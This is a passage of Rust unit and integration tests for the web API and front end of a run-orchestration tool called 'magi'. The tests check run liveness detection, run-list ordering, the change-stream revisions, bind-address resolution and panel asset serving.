7853    /// (a PR closed without merging, say) apart from one `[merge] mode =
7854    /// "none"` left unmerged for good — the confusion the operator flagged
7855    /// after the CLI report already grew a `not landed — nothing to do by
7856    /// design` line for exactly this case (`report.rs`). Both the list route
7857    /// and the detail route must carry a flag the phone can key on instead of
7858    /// re-deriving it from `status` + `merge.mode` itself.
7859    #[tokio::test]
7860    async fn a_mode_none_ready_run_is_flagged_unmerged_by_design_everywhere() {
7861        let f = Fixture::start().await;
7862
7863        let mut none_run = RunState::new(
7864            PathBuf::from("/repo/magi"),
7865            "main".to_owned(),
7866            "0123456789abcdef".to_owned(),
7867            "Add a web UI".to_owned(),
7868            Config::default(),
7869        );
7870        none_run.id = "20260902-140503-none".to_owned();
7871        none_run.status = RunStatus::Ready;
7872        none_run.merge = Some(crate::run::MergeOutcome {
7873            mode: crate::config::MergeMode::None,
7874            ok: true,
7875            detail: "git -C /repo merge --no-ff magi/x/A".to_owned(),
7876        });
7877        write_state(&f.runs(), &none_run);
7878
7879        let mut pr_run = RunState::new(
7880            PathBuf::from("/repo/magi"),
7881            "main".to_owned(),
7882            "0123456789abcdef".to_owned(),
7883            "Add a web UI".to_owned(),
7884            Config::default(),
7885        );
7886        pr_run.id = "20260902-140504-prcl".to_owned();
7887        pr_run.status = RunStatus::Ready;
7888        pr_run.merge = Some(crate::run::MergeOutcome {
7889            mode: crate::config::MergeMode::Pr,
7890            ok: false,
7891            detail: "https://example.com/pr/1 was closed without merging".to_owned(),
7892        });
7893        write_state(&f.runs(), &pr_run);
7894
7895        let summary = f.get("/api/runs").await.json();
7896        let rows: std::collections::HashMap<&str, &Value> = summary
7897            .as_array()
7898            .expect("an array")
7899            .iter()
7900            .map(|r| (r["id"].as_str().expect("an id"), r))
7901            .collect();
7902        assert_eq!(rows[none_run.id.as_str()]["status"], "ready");
7903        assert_eq!(
7904            rows[none_run.id.as_str()]["unmerged_by_design"],
7905            true,
7906            "a mode-none Ready must be flagged in the list"
7907        );
7908        assert_eq!(
7909            rows[pr_run.id.as_str()]["unmerged_by_design"],
7910            false,
7911            "a Ready reached by a closed pull request is a different case"
7912        );
7913
7914        let none_detail = f.get(&format!("/api/runs/{}", none_run.id)).await.json();
7915        assert_eq!(none_detail["status"], "ready");
7916        assert_eq!(none_detail["unmerged_by_design"], true);
7917
7918        let pr_detail = f.get(&format!("/api/runs/{}", pr_run.id)).await.json();
7919        assert_eq!(pr_detail["unmerged_by_design"], false);
7920    }
7921
7922    /// `RunState::active` is only ever cleared by whoever populated it, so the
7923    /// detail route also has to say whether a daemon is actually still
7924    /// driving this run right now — otherwise a seat from a killed process's
7925    /// last wave would read as live forever.
7926    #[tokio::test]
7927    async fn run_detail_reports_active_seats_and_whether_a_daemon_confirms_them() {
7928        let f = Fixture::start().await;
7929        // Matches `write_daemon`'s hard-coded `current.run`, so the second
7930        // half of this test can claim the daemon is working on it without a
7931        // second helper.
7932        let id = "20260902-140502-bbbb";
7933        let mut state = RunState::new(
7934            PathBuf::from("/repo/magi"),
7935            "main".to_owned(),
7936            "0123456789abcdef".to_owned(),
7937            "Add a web UI".to_owned(),
7938            Config::default(),
7939        );
7940        state.id = id.to_owned();
7941        state.status = RunStatus::Judging;
7942        state.seat_started("judge", "judge-2", std::time::Duration::from_secs(120), 0);
7943        let dir = f.runs().join(id);
7944        std::fs::create_dir_all(&dir).expect("run dir");
7945        std::fs::write(
7946            dir.join("run.json"),
7947            serde_json::to_string_pretty(&state).expect("serialize run"),
7948        )
7949        .expect("write run.json");
7950
7951        // No daemon.json at all, and no `driver_pid` recorded either (this
7952        // state was written directly, never through `execute()`): there is
7953        // nothing to confirm either way, so the route must say `"unknown"` —
7954        // never `"dead"`, which is exactly the false diagnosis a manual `magi
7955        // run` used to get from this route before `driver_pid` existed.
7956        let cold = f.get(&format!("/api/runs/{id}")).await.json();
7957        assert_eq!(cold["active"]["judge-2"]["node"], "judge");
7958        assert_eq!(cold["live"], "unknown", "{cold}");
7959
7960        // A fresh heartbeat naming exactly this run: the same entry now reads
7961        // as confirmed, not merely recorded.
7962        write_daemon(f.home.path(), Timestamp::now());
7963        let warm = f.get(&format!("/api/runs/{id}")).await.json();
7964        assert_eq!(warm["live"], "live", "{warm}");
7965    }
7966
7967    /// The gap `driver_pid` exists to close: a manual `magi run` / `magi
7968    /// review` claims no daemon at all, so before this field existed the
7969    /// route above read it as `"dead"` — indistinguishable from a run a
7970    /// killed process abandoned — the whole time it was genuinely still
7971    /// answering. With a live pid recorded, it must read `"live"` even
7972    /// though no daemon claims it.
7973    #[tokio::test]
7974    async fn run_detail_reads_a_manual_run_with_a_live_driver_pid_as_live_without_a_daemon() {
7975        let f = Fixture::start().await;
7976        let id = "20260922-090000-cccc";
7977        let mut state = RunState::new(
7978            PathBuf::from("/repo/magi"),
7979            "main".to_owned(),
7980            "0123456789abcdef".to_owned(),
7981            "Review only".to_owned(),
7982            Config::default(),
7983        );
7984        state.id = id.to_owned();
7985        state.status = RunStatus::Reviewing;
7986        state.seat_started("review", "review-1", std::time::Duration::from_secs(120), 0);
7987        // This test process's own pid: guaranteed alive, and never needs a
7988        // real daemon or a second process to prove it. The matching start-time
7989        // marker is what `liveness` now requires alongside a live pid — see
7990        // `RunState::driver_started_at`'s own doc for why the pid alone is
7991        // not enough.
7992        state.driver_pid = Some(std::process::id());
7993        state.driver_started_at = Some(
7994            crate::proc::process_started_at(std::process::id())
7995                .expect("this test process's own start time must be queryable"),
7996        );
7997        let dir = f.runs().join(id);
7998        std::fs::create_dir_all(&dir).expect("run dir");
7999        std::fs::write(
8000            dir.join("run.json"),
8001            serde_json::to_string_pretty(&state).expect("serialize run"),
8002        )
8003        .expect("write run.json");
8004
8005        let detail = f.get(&format!("/api/runs/{id}")).await.json();
8006        assert_eq!(detail["live"], "live", "{detail}");
8007    }
8008
8009    /// A killed manual run's pid can be handed to a wholly unrelated later
8010    /// process — a live query on `driver_pid` alone would read this as
8011    /// `"live"`, exactly the false positive `driver_started_at` exists to
8012    /// catch (see that field's own doc, and `RunState::liveness_with`'s
8013    /// pid-reuse test). The route must read it as `"dead"`, not `"live"`.
8014    #[tokio::test]
8015    async fn run_detail_reads_a_live_pid_as_dead_once_its_start_time_no_longer_matches() {
8016        let f = Fixture::start().await;
8017        let id = "20260922-090100-dddd";
8018        let mut state = RunState::new(
8019            PathBuf::from("/repo/magi"),
8020            "main".to_owned(),
8021            "0123456789abcdef".to_owned(),
8022            "Review only".to_owned(),
8023            Config::default(),
8024        );
8025        state.id = id.to_owned();
8026        state.status = RunStatus::Reviewing;
8027        state.seat_started("review", "review-1", std::time::Duration::from_secs(120), 0);
8028        // This test process's own pid really is alive, but the marker
8029        // recorded here does not match what it actually started at —
8030        // standing in for the pid having since been reused by a different
8031        // process than the one that wrote `run.json`.
8032        state.driver_pid = Some(std::process::id());
8033        state.driver_started_at = Some("not-this-processes-real-start-time".to_owned());
8034        let dir = f.runs().join(id);
8035        std::fs::create_dir_all(&dir).expect("run dir");
8036        std::fs::write(
8037            dir.join("run.json"),
8038            serde_json::to_string_pretty(&state).expect("serialize run"),
8039        )
8040        .expect("write run.json");
8041
8042        let detail = f.get(&format!("/api/runs/{id}")).await.json();
8043        assert_eq!(detail["live"], "dead", "{detail}");
8044    }
8045
8046    /// The deck's competition list is normally the first place an operator
8047    /// sees an old run. It must carry the same process verdict as detail, or
8048    /// its `reviewing` chip keeps falsely advertising a dead run as in flight.
8049    #[test]
8050    fn summarize_asks_about_each_pid_once_and_keeps_the_row_meaning() {
8051        let mk = |id: &str, pid: Option<u32>| {
8052            let mut s = RunState::new(
8053                PathBuf::from("/repo/magi"),
8054                "main".to_owned(),
8055                "0123456789abcdef".to_owned(),
8056                "Add a web UI".to_owned(),
8057                Config::default(),
8058            );
8059            s.id = id.to_owned();
8060            s.driver_pid = pid;
8061            s.driver_started_at = Some("t0".to_owned());
8062            s
8063        };
8064        let states = vec![
8065            mk("20260902-140502-aaaa", Some(77)),
8066            mk("20260902-140502-bbbb", Some(77)),
8067            mk("20260902-140502-cccc", Some(77)),
8068            mk("20260902-140502-dddd", None),
8069        ];
8070        let open: HashSet<String> = ["20260902-140502-bbbb".to_owned()].into();
8071        let claimed: HashSet<String> = ["20260902-140502-dddd".to_owned()].into();
8072        let sup: HashMap<String, String> = [(
8073            "20260902-140502-aaaa".to_owned(),
8074            "20260902-140502-cccc".to_owned(),
8075        )]
8076        .into();
8077
8078        let status_calls = std::cell::Cell::new(0);
8079        let identity_calls = std::cell::Cell::new(0);
8080        let probe = std::cell::RefCell::new(crate::proc::ProcProbe::new(
8081            |_| {
8082                status_calls.set(status_calls.get() + 1);
8083                Some(true)
8084            },
8085            |_| {
8086                identity_calls.set(identity_calls.get() + 1);
8087                Some("t0".to_owned())
8088            },
8089        ));
8090        let rows = summarize(
8091            states,
8092            &open,
8093            &claimed,
8094            &sup,
8095            |p| probe.borrow_mut().status(p),
8096            |p| probe.borrow_mut().started_at(p),
8097        );
8098
8099        assert_eq!(status_calls.get(), 1, "one pid, one status query");
8100        assert_eq!(identity_calls.get(), 1, "one pid, one identity query");
8101        assert_eq!(rows.len(), 4);
8102        assert!(!rows[0].waiting && rows[1].waiting);
8103        assert_eq!(rows[0].live, crate::run::Liveness::Live);
8104        assert_eq!(rows[3].live, crate::run::Liveness::Live, "claim alone");
8105        assert_eq!(rows[0].superseded_by.as_deref(), Some("cccc"));
8106        assert_eq!(rows[1].superseded_by, None);
8107    }
8108
8109    #[test]
8110    fn run_list_exposes_a_confirmed_dead_driver_for_stale_presentation() {
8111        let mut state = RunState::new(
8112            PathBuf::from("/repo/magi"),
8113            "main".to_owned(),
8114            "0123456789abcdef".to_owned(),
8115            "Review only".to_owned(),
8116            Config::default(),
8117        );
8118        state.id = "20260922-090200-dead".to_owned();
8119        state.status = RunStatus::Reviewing;
8120        let row = serde_json::to_value(RunSummary::of(&state, false, crate::run::Liveness::Dead))
8121            .expect("serialize list row");
8122        assert_eq!(row["status"], "reviewing");
8123        assert_eq!(row["live"], "dead", "{row}");
8124        assert!(!row["done"].as_bool().unwrap());
8125    }
8126
8127    #[tokio::test]
8128    async fn the_run_list_is_newest_first_and_honours_a_limit() {
8129        let f = Fixture::start().await;
8130        for id in [
8131            "20260902-140501-aaaa",
8132            "20260902-140502-bbbb",
8133            "20260902-140503-cccc",
8134        ] {
8135            write_run(&f.runs(), id, RunStatus::Merged);
8136        }
8137
8138        let all = f.get("/api/runs").await.json();
8139        let capped = f.get("/api/runs?limit=2").await.json();
8140
8141        assert_eq!(all[0]["id"], "20260902-140503-cccc");
8142        assert_eq!(all.as_array().map(Vec::len), Some(3));
8143        assert_eq!(capped.as_array().map(Vec::len), Some(2));
8144        assert_eq!(capped[0]["id"], "20260902-140503-cccc");
8145    }
8146
8147    #[tokio::test]
8148    async fn the_report_route_serves_the_terminal_report_as_plain_text() {
8149        let f = Fixture::start().await;
8150        write_run(&f.runs(), "20260902-140501-a1b2", RunStatus::Blocked);
8151
8152        let res = f.get("/api/runs/20260902-140501-a1b2/report").await;
8153
8154        assert_eq!(res.status, 200);
8155        assert!(
8156            res.headers
8157                .contains("content-type: text/plain; charset=utf-8"),
8158            "a browser must render it, not download it: {}",
8159            res.headers
8160        );
8161        // The assertion is on content, not on the absence of escapes: colour
8162        // is a process-global that `serve` turns off at startup, and another
8163        // test in this binary may own it while this one runs.
8164        assert!(
8165            res.body.contains("20260902-140501-a1b2"),
8166            "the report is about the run that was asked for: {}",
8167            res.body
8168        );
8169    }
8170
8171    #[tokio::test]
8172    async fn the_front_end_is_served_from_the_binary_with_types_a_phone_renders() {
8173        let f = Fixture::start().await;
8174
8175        let html = f.get("/").await;
8176        let css = f.get("/app.css").await;
8177        let js = f.get("/app.js").await;
8178
8179        assert_eq!((html.status, css.status, js.status), (200, 200, 200));
8180        assert!(
8181            html.headers
8182                .contains("content-type: text/html; charset=utf-8")
8183        );
8184        assert!(css.headers.contains("content-type: text/css"));
8185        assert!(js.headers.contains("content-type: text/javascript"));
8186        assert_eq!(html.body, INDEX_HTML, "compiled in, never read from disk");
8187    }
8188
8189    #[test]
8190    fn review_rounds_label_a_distinct_verified_head() {
8191        assert!(APP_JS.contains("round.verified_head"));
8192        assert!(APP_JS.contains("verified HEAD"));
8193        assert!(APP_JS.contains("verified ${String(round.verified_head).slice(0, 7)}"));
8194    }
8195
8196    #[test]
8197    fn queue_ui_presents_blocked_dependencies_and_resolved_questions() {
8198        // A blocked task's chip and note must not fall back to a queued-like
8199        // rendering - review 1623 R2-2-1's finding, fixed for the chip table
8200        // itself by e11fc58 but never checked here.
8201        assert!(APP_JS.contains("blocked: { glyph:"));
8202        assert!(APP_JS.contains("Blocked. Waiting on another task or question to resolve."));
8203
8204        // `blocked_by` mixes task ids and question ids in the same list, and
8205        // the client can only tell them apart by checking each id against
8206        // what it actually knows - never by guessing from the id's shape.
8207        assert!(APP_JS.contains("function classifyBlockedBy(blockedBy, tasksById, questionsById)"));
8208        assert!(
8209            APP_JS.contains(
8210                "if (parts.length) noteText = `${noteText} Waiting on ${parts.join(\" and \")}.`;"
8211            ),
8212            "the note line must name what a blocked task is waiting on, not just that it is blocked"
8213        );
8214        // The classification must key off `status_str`, never off `blocked_by`
8215        // or `block_reason` merely being present - both can survive briefly
8216        // on a task a hold or a dead daemon just moved off `blocked`.
8217        assert!(APP_JS.contains("if (status === \"blocked\") {"));
8218
8219        // A question a task is blocked on gets its own node in the same
8220        // dependency graph, not just a task-shaped node with nothing known
8221        // about it.
8222        assert!(APP_JS.contains("function depNode(id, byId, questionNodes)"));
8223        assert!(APP_JS.contains("questionNodes.set(dep, questionsById.get(dep));"));
8224        assert!(
8225            APP_JS.contains("location.hash = \"#/questions\";"),
8226            "a question node must jump to the Questions screen, not pretend to be a task"
8227        );
8228
8229        // `Task::answers` - decisions already made - are shown as a record on
8230        // the card, the same disclosure style as the full instruction.
8231        assert!(APP_JS.contains("Resolved questions"));
8232        assert!(APP_JS.contains("r.answersList.append("));
8233        assert!(APP_CSS.contains(".task-answers"));
8234    }
8235
8236    #[test]
8237    fn a_task_notification_links_to_its_own_card_not_the_bare_backlog() {
8238        // A `kind: "task"` notice link used to drop the id on the floor and
8239        // point at `#/queue` outright, so every task notification landed on
8240        // whatever happened to be first in the Backlog rather than the task
8241        // it was actually about.
8242        assert!(
8243            APP_JS.contains(
8244                "el(\"a\", { href: `#/queue/${encodeURIComponent(link.id)}`, text: `Task ${shortId(link.id)}` })"
8245            ),
8246            "a task notice's link must carry the task id into the hash, not just name the Backlog screen"
8247        );
8248        assert!(
8249            !APP_JS.contains("el(\"a\", { href: \"#/queue\", text: `Task ${shortId(link.id)}` })"),
8250            "regression: the task link must not go back to naming the bare Backlog route"
8251        );
8252
8253        // The route parser has to read that id back out before applyRoute()
8254        // can do anything with it.
8255        assert!(
8256            APP_JS.contains(
8257                "if (parts[0] === \"queue\" && parts[1]) return { name: \"queue\", id: decodeURIComponent(parts[1]) };"
8258            ),
8259            "`#/queue/<id>` must parse into a route carrying that id"
8260        );
8261
8262        // And the Backlog view has to actually land on the card once it can
8263        // - see consumeQueueFocus(), which renderQueue() calls on every pass
8264        // so a focus set before the queue has loaded is retried once it has.
8265        assert!(APP_JS.contains("state.queueFocus = route.id;"));
8266        assert!(APP_JS.contains("function consumeQueueFocus()"));
8267        assert!(APP_JS.contains("jumpToTask(id);"));
8268    }
8269
8270    #[test]
8271    fn consuming_a_queue_focus_survives_clearing_a_stale_backlog_search() {
8272        // consumeQueueFocus() clears an active Backlog search before it can
8273        // scroll to the target card (the sections list is hidden while a
8274        // search is showing), by recursing back into renderQueue(). The
8275        // fixer's first cut nulled state.queueFocus before that recursive
8276        // call, so the second pass saw nothing to jump to and the jump was
8277        // silently dropped whenever a notification's link was opened with a
8278        // stale search still active. state.queueFocus must only be cleared
8279        // right before jumpToTask() actually runs.
8280        assert!(
8281            APP_JS.contains(
8282                "  if (!id || state.queue === null) return;\n  if (state.queueSearch.trim() !== \"\") {"
8283            ),
8284            "the search-clearing branch must run before state.queueFocus is cleared, or the \
8285             recursive renderQueue() call has nothing left to jump to"
8286        );
8287        assert!(
8288            APP_JS.contains("state.queueFocus = null;\n  jumpToTask(id);"),
8289            "state.queueFocus must be cleared immediately before the jump it guards, not earlier"
8290        );
8291    }
8292
8293    #[test]
8294    fn a_notification_card_navigates_from_anywhere_on_it_not_just_its_link_text() {
8295        // The task's own repro: only the link text inside .notice-meta was
8296        // clickable, so a tap on the message, the timestamp, or the card's
8297        // padding did nothing - on a phone that reads as "the card doesn't
8298        // work" even though the tiny link inside it did. Mark read / Dismiss
8299        // must keep working independently of this: `.closest("a, button")`
8300        // is what lets a tap that actually lands on those elements fall
8301        // through instead of being hijacked into a navigation.
8302        assert!(
8303            APP_JS.contains(
8304                "onclick: link ? (event) => { if (!event.target.closest(\"a, button\")) link.click(); } : null"
8305            ),
8306            "the notice card itself must forward a tap outside its link/buttons to the link's own click"
8307        );
8308    }
8309
8310    #[test]
8311    fn review_rounds_tell_a_stale_verification_and_a_resource_block_apart_from_a_real_result() {
8312        assert!(
8313            APP_JS.contains("round.verified_head !== round.head"),
8314            "a round that verified an earlier commit must be visibly distinct from one that \
8315             verified the head reviewers are looking at now"
8316        );
8317        assert!(
8318            APP_JS.contains("round.verified_at"),
8319            "when a check ran must be on the wire, not just which commit"
8320        );
8321        assert!(
8322            APP_JS.contains("resource_blocked"),
8323            "a command magi never got to run (shared build cache contention) must not render \
8324             the same as a command that ran and failed"
8325        );
8326    }
8327
8328    #[tokio::test]
8329    async fn the_change_stream_announces_the_current_revisions_on_connect() {
8330        let f = Fixture::start().await;
8331
8332        let mut socket = tokio::net::TcpStream::connect(f.addr)
8333            .await
8334            .expect("connect");
8335        socket
8336            .write_all(
8337                b"GET /api/events HTTP/1.1\r\nHost: magi\r\nAccept: text/event-stream\r\n\r\n",
8338            )
8339            .await
8340            .expect("write request");
8341
8342        // Read until the first event arrives rather than to end of stream: the
8343        // stream is endless by design, which is the point of the route.
8344        let mut seen = String::new();
8345        let mut buf = [0u8; 1024];
8346        while !seen.contains("event: change") {
8347            let read = tokio::time::timeout(Duration::from_secs(5), socket.read(&mut buf))
8348                .await
8349                .expect("the stream must speak within five seconds")
8350                .expect("read");
8351            assert!(read > 0, "the server closed the change stream: {seen}");
8352            seen.push_str(&String::from_utf8_lossy(&buf[..read]));
8353        }
8354
8355        assert!(
8356            seen.to_lowercase()
8357                .contains("content-type: text/event-stream"),
8358            "the browser only reconnects automatically for a real SSE stream: {seen}"
8359        );
8360        let data = seen
8361            .lines()
8362            .find_map(|l| l.strip_prefix("data:"))
8363            .expect("a data line");
8364        let payload: Value = serde_json::from_str(data.trim()).expect("json payload");
8365        assert!(
8366            payload["queue_rev"].is_u64()
8367                && payload["runs_rev"].is_u64()
8368                && payload["questions_rev"].is_u64()
8369                && payload["talks_rev"].is_u64()
8370                && payload["notifications_rev"].is_u64()
8371                && payload["loop_rev"].is_u64(),
8372            "the client needs one revision per store to know what to refetch, \
8373             and `talks_rev` is the only notification a standing talk gets - a \
8374             phone whose radio slept through a turn learns about it here, as \
8375             does one whose operator started the loop from another device: \
8376             {payload}"
8377        );
8378
8379        // The front end re-polls health on a timer and on wake, and takes the
8380        // revisions from that answer whenever the stream is not up. So health
8381        // has to carry every key the stream carries: a phone on a link that
8382        // will not hold an SSE connection is exactly the phone that must still
8383        // notice a question, and a missing key there is not a 500 but a UI
8384        // that quietly stops updating.
8385        let health = f.get("/api/health").await.json();
8386        for key in [
8387            "queue_rev",
8388            "runs_rev",
8389            "questions_rev",
8390            "talks_rev",
8391            "notifications_rev",
8392            "loop_rev",
8393        ] {
8394            assert!(
8395                health[key].is_u64(),
8396                "health is the change stream's fallback and is missing `{key}`: {health}"
8397            );
8398        }
8399    }
8400
8401    #[tokio::test]
8402    async fn a_new_turn_on_a_talk_moves_the_change_stream_revision() {
8403        let f = Fixture::start().await;
8404        let before = f.get("/api/health").await.json()["talks_rev"]
8405            .as_u64()
8406            .expect("talks_rev");
8407
8408        let talk = seed_talk(&f, "20260904-014455-ab12", "open");
8409        std::thread::sleep(Duration::from_millis(10));
8410        let mut on_disk = f.talks().get(&talk).expect("get seeded talk");
8411        on_disk.turns.push(crate::talk::Turn {
8412            who: crate::talk::Who::Operator,
8413            body: "a new turn".to_owned(),
8414            at: Timestamp::now(),
8415            attachments: Vec::new(),
8416        });
8417        f.talks().put(&mut on_disk).expect("record a turn");
8418
8419        let after = f.get("/api/health").await.json()["talks_rev"]
8420            .as_u64()
8421            .expect("talks_rev");
8422        assert_ne!(
8423            before, after,
8424            "a phone must be able to notice a talk's reply without polling every store"
8425        );
8426    }
8427
8428    #[test]
8429    fn bind_reads_back_from_the_spelling_the_cli_prints() {
8430        // The CLI shows the default in `--help` and parses whatever comes
8431        // back, so the two directions have to agree or `--bind auto` breaks
8432        // the moment someone copies the help text.
8433        for bind in [Bind::Auto, Bind::Addr(IpAddr::V4(Ipv4Addr::LOCALHOST))] {
8434            assert_eq!(bind.to_string().parse::<Bind>(), Ok(bind));
8435        }
8436        assert_eq!("AUTO".parse::<Bind>(), Ok(Bind::Auto));
8437        assert!("everywhere".parse::<Bind>().is_err());
8438    }
8439
8440    #[test]
8441    fn an_explicit_bind_address_is_taken_verbatim() {
8442        let asked = IpAddr::V4(Ipv4Addr::new(192, 168, 1, 20));
8443
8444        let (addr, warning) = resolve_bind(&Bind::Addr(asked));
8445
8446        assert_eq!(addr, asked);
8447        assert!(
8448            warning.is_none(),
8449            "an operator who named an address gets no lecture"
8450        );
8451    }
8452
8453    #[test]
8454    fn bind_auto_either_finds_a_tailnet_address_or_says_the_ui_is_local_only() {
8455        let (addr, warning) = resolve_bind(&Bind::Auto);
8456
8457        // This has to hold on a CI runner with no `tailscale` and on a dev box
8458        // with one, so the invariant asserted is the one shared by both
8459        // outcomes: the address is either a real tailnet address offered
8460        // without comment, or loopback with an explanation. What must never
8461        // happen is a silent fallback - an operator told "listening on
8462        // 127.0.0.1" with no reason would go looking for a firewall.
8463        match addr {
8464            IpAddr::V4(ip) if is_tailnet(&ip) => {
8465                assert!(warning.is_none(), "a tailnet address needs no warning");
8466            }
8467            other => {
8468                assert_eq!(other, IpAddr::V4(Ipv4Addr::LOCALHOST));
8469                let warning = warning.expect("a fallback has to explain itself");
8470                assert!(
8471                    warning.contains("127.0.0.1") && warning.contains("local-only"),
8472                    "the warning says what happened and what it costs: {warning}"
8473                );
8474            }
8475        }
8476    }
8477
8478    #[test]
8479    fn only_the_cgnat_block_counts_as_a_tailnet_address() {
8480        // `tailscale ip -4` output is trusted only inside 100.64.0.0/10; the
8481        // boundary cases are what stop us binding to some other tool's idea of
8482        // an address.
8483        assert!(is_tailnet(&Ipv4Addr::new(100, 64, 0, 1)));
8484        assert!(is_tailnet(&Ipv4Addr::new(100, 127, 255, 254)));
8485        assert!(!is_tailnet(&Ipv4Addr::new(100, 63, 255, 255)));
8486        assert!(!is_tailnet(&Ipv4Addr::new(100, 128, 0, 1)));
8487        assert!(!is_tailnet(&Ipv4Addr::new(127, 0, 0, 1)));
8488    }
8489
8490    #[test]
8491    fn an_ambiguous_prefix_is_a_bad_request_and_a_missing_one_is_not_found() {
8492        let ids = vec![
8493            "20260902-140501-aaaa".to_owned(),
8494            "20260902-140502-aabb".to_owned(),
8495        ];
8496
8497        let missing = pick(ids.clone(), "zzzz", "run").expect_err("no match");
8498        let ambiguous = pick(ids.clone(), "202609", "run").expect_err("two matches");
8499        let short = pick(ids, "aabb", "run").expect("the short id is the tail of an id");
8500
8501        assert_eq!(missing.status, StatusCode::NOT_FOUND);
8502        assert_eq!(ambiguous.status, StatusCode::BAD_REQUEST);
8503        assert_eq!(short, "20260902-140502-aabb");
8504    }
8505    #[tokio::test]
8506    async fn a_panel_reaches_its_assets_by_the_bare_name_it_was_told_to_use() {
8507        // The prompt tells agents to reference attachments by bare filename.
8508        // A document served at `.../panel` resolves `shot.png` against its own
8509        // directory, i.e. `.../shot.png`, which is not the asset route - so a
8510        // panel written exactly as instructed showed broken images. Caught by
8511        // looking at a real one in a browser, not by reading the code.
8512        let fx = Fixture::start().await;
8513        let id = panel(
8514            &fx,
8515            "<img src=\"shot.png\">",
8516            &[("shot.png", b"\x89PNG\r\n\x1a\n")],
8517        );
8518
8519        // The frame's own URL ends in a filename, so its siblings are reachable.
8520        let doc = fx
8521            .get(&format!("/api/questions/{id}/panel/index.html"))
8522            .await;
8523        assert_eq!(doc.status, 200, "{}", doc.body);
8524        assert_eq!(doc.header("content-type"), Some("text/html; charset=utf-8"));
8525
8526        let sibling = fx.get(&format!("/api/questions/{id}/panel/shot.png")).await;
8527        assert_eq!(sibling.status, 200, "{}", sibling.body);
8528        assert_eq!(sibling.header("content-type"), Some("image/png"));
8529        assert_eq!(
8530            sibling.header("content-security-policy"),
8531            Some(PANEL_CSP),
8532            "the sibling route must carry the same policy as the asset route"
8533        );
8534
8535        // The original spelling keeps working: HEAD on it is how the front end
8536        // decides whether to mount a frame at all.
8537        assert_eq!(
8538            fx.head(&format!("/api/questions/{id}/panel")).await.status,
8539            200
8540        );
8541    }
8542
8543    #[test]
8544    fn runs_revision_moves_when_deleting_an_older_run() {
8545        let temp = TempDir::new().expect("tempdir");
8546        let runs = temp.path().join("runs");
8547        std::fs::create_dir_all(&runs).expect("create runs dir");
8548
8549        assert_eq!(runs_revision(&runs), 0, "empty runs has 0 revision");
8550
8551        write_run(&runs, "20260901-100000-old1", RunStatus::Merged);
8552        std::thread::sleep(Duration::from_millis(10));
8553        write_run(&runs, "20260902-100000-new2", RunStatus::Merged);
8554
8555        let rev_before = runs_revision(&runs);
8556        assert!(rev_before > 0);
8557
8558        let old_dir = runs.join("20260901-100000-old1");
8559        std::fs::remove_dir_all(&old_dir).expect("remove old run");
8560
8561        let rev_after = runs_revision(&runs);
8562        assert_ne!(
8563            rev_before, rev_after,
8564            "deleting an older run must change the revision so other clients see the deletion"
8565        );
8566    }
8567
8568    /// A run's own `run.json` on an explicit `runs` root, bypassing the
8569    /// process-global home entirely — `RunState::save` writes through
8570    /// `run::home()`, whose `set_home` is a `OnceLock` no unit test may touch
8571    /// (see `tests::home_lock` in the integration suite for why).
8572    fn write_state(runs: &FsPath, state: &RunState) {
8573        let dir = runs.join(&state.id);
8574        std::fs::create_dir_all(&dir).expect("run dir");
8575        std::fs::write(
8576            dir.join("run.json"),
8577            serde_json::to_string_pretty(state).expect("serialize run"),
8578        )
8579        .expect("write run.json");
8580    }
8581
8582    /// A seat starting or finishing is a write to `run.json` like any other,
8583    /// so it moves the same revision the change stream already watches —
8584    /// nothing new for `/api/events` to learn, but the property this feature
8585    /// depends on to reach the phone without a poll.
8586    #[test]
8587    fn runs_revision_moves_when_a_seat_starts_and_again_when_it_finishes() {
8588        let temp = TempDir::new().expect("tempdir");
8589        let runs = temp.path().join("runs");
8590        std::fs::create_dir_all(&runs).expect("create runs dir");
8591        let mut state = RunState::new(
8592            PathBuf::from("/repo/magi"),
8593            "main".to_owned(),
8594            "0123456789abcdef".to_owned(),
8595            "task".to_owned(),
8596            Config::default(),
8597        );
8598        state.id = "20260902-100000-c0de".to_owned();
8599        write_state(&runs, &state);
8600
8601        let rev_idle = runs_revision(&runs);
8602        std::thread::sleep(Duration::from_millis(10));
8603        state.seat_started("judge", "judge-1", std::time::Duration::from_secs(60), 0);
8604        write_state(&runs, &state);
8605        let rev_started = runs_revision(&runs);
8606        assert_ne!(
8607            rev_idle, rev_started,
8608            "a seat starting must move the revision"
8609        );
8610
8611        std::thread::sleep(Duration::from_millis(10));
8612        state.seat_finished("judge-1");
8613        write_state(&runs, &state);
8614        let rev_finished = runs_revision(&runs);
8615        assert_ne!(
8616            rev_started, rev_finished,
8617            "and clearing it again must move the revision a second time"
8618        );
8619    }
8620
8621    #[tokio::test]
8622    async fn queue_json_carries_dependency_fields_and_a_hold_clears_them() {
8623        // `TaskView` flattens `Task`, so this is really asserting that
8624        // `#[serde(flatten)]` at web.rs:2530 hasn't quietly dropped a field -
8625        // e11fc58 added `blocked_by`/`block_reason`/`answers` to `Task` but
8626        // never touched web.rs, so nothing here caught it if it had.
8627        let fx = Fixture::start().await;
8628        let q = fx.queue();
8629
8630        let mut t = Task::new(
8631            "Task".to_owned(),
8632            "Instruction".to_owned(),
8633            PathBuf::from("/repo"),
8634            Source::Human,
8635        );
8636        t.block(
8637            vec!["20260101-000000-dead".to_owned()],
8638            Some("waiting on Task 1".to_owned()),
8639        );
8640        t.answers.push(crate::queue::AnsweredQuestion {
8641            question: "Which backend?".to_owned(),
8642            answer: "SQLite".to_owned(),
8643        });
8644        q.put(&mut t).expect("put t");
8645
8646        let res = fx.get("/api/queue").await;
8647        assert_eq!(res.status, 200);
8648        let list = res.json();
8649        let view = list
8650            .as_array()
8651            .expect("array")
8652            .iter()
8653            .find(|v| v["id"] == t.id)
8654            .expect("task in list");
8655        assert_eq!(view["status_str"], "blocked");
8656        assert_eq!(
8657            view["blocked_by"],
8658            serde_json::json!(["20260101-000000-dead"])
8659        );
8660        assert_eq!(view["block_reason"], "waiting on Task 1");
8661        assert_eq!(view["answers"][0]["question"], "Which backend?");
8662        assert_eq!(view["answers"][0]["answer"], "SQLite");
8663
8664        // A manual hold clears `blocked_by`/`block_reason` (`Task::hold_manual`)
8665        // but never `answers` - that is a settled decision, not state
8666        // describing the current block, so it survives.
8667        let res = fx
8668            .post(&format!("/api/queue/{}/hold", t.short()), None)
8669            .await;
8670        assert_eq!(res.status, 200);
8671        let held = res.json();
8672        assert_eq!(held["status_str"], "held");
8673        assert_eq!(held["blocked_by"], serde_json::json!([]));
8674        assert!(held["block_reason"].is_null());
